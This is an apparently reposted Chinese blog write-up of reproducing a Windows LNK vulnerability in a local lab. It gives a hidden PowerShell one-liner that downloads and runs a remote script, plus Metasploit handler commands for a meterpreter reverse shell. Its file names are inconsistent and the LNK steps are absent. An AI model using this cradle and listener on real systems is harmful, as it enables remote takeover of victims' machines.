前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >windows lnk漏洞复现过程

windows lnk漏洞复现过程

作者头像
用户1467662
发布2018-03-29 18:34:37
1.2K0
发布2018-03-29 18:34:37
举报
文章被收录于专栏:农夫安全

前言

最近Windows出了一个lnk的漏洞,本着不复现不罢休的原则,自己搭建环境复现了一波,虽然没有这么顺利,但最后还是复现成功,哈哈哈哈,大牛就勿喷了,技术能力有限。复现了好久~~~~

0x01 准备阶段

1、本机IP

2、利用pentestbox生成一个反弹后门,后门保存地址为C盘根目录

3、开启phpstudy环境,将shell.ps1放置解析根目录下。

4、放入我们的恶意脚本

powershell -windowstyle hidden -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://192.168.2.102/111.ps1');xx.ps1"

0x02 开启msf

接着开启我们的神器--msf

metasploit做以下相关配置: msf > use exploit/multi/handler msf exploit(handler) > set payload windows/x64/meterpreter/reverse_tcp msf exploit(handler) > set LHOST *.*.*.* //本机IP msf exploit(handler) > set LPORT **** //本机监听端口 msf exploit(handler) > run

0x03 填坑

小编复现的时候出现了几个问题,试了好久才解决,大牛勿喷

1、首先一定要攻击机器能运行powershell

2、环境变量加上powershell的路径,否则会一直提示找不到powershell

0x04 最后

2、本次复现全部在本地实验环境中,文章仅供技术交流,如您使用该文章用户非法攻击其他计算机,造成的损失与本作者一概无关,希望各位老铁们能遵纪守法,做一位合格的好市民。

本文参与 腾讯云自媒体同步曝光计划,分享自微信公众号。
原始发表:2017-06-17,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 网络安全社区悦信安 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
目录
  • 前言
  • 0x01 准备阶段
  • 0x02 开启msf
  • 0x03 填坑
  • 0x04 最后
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档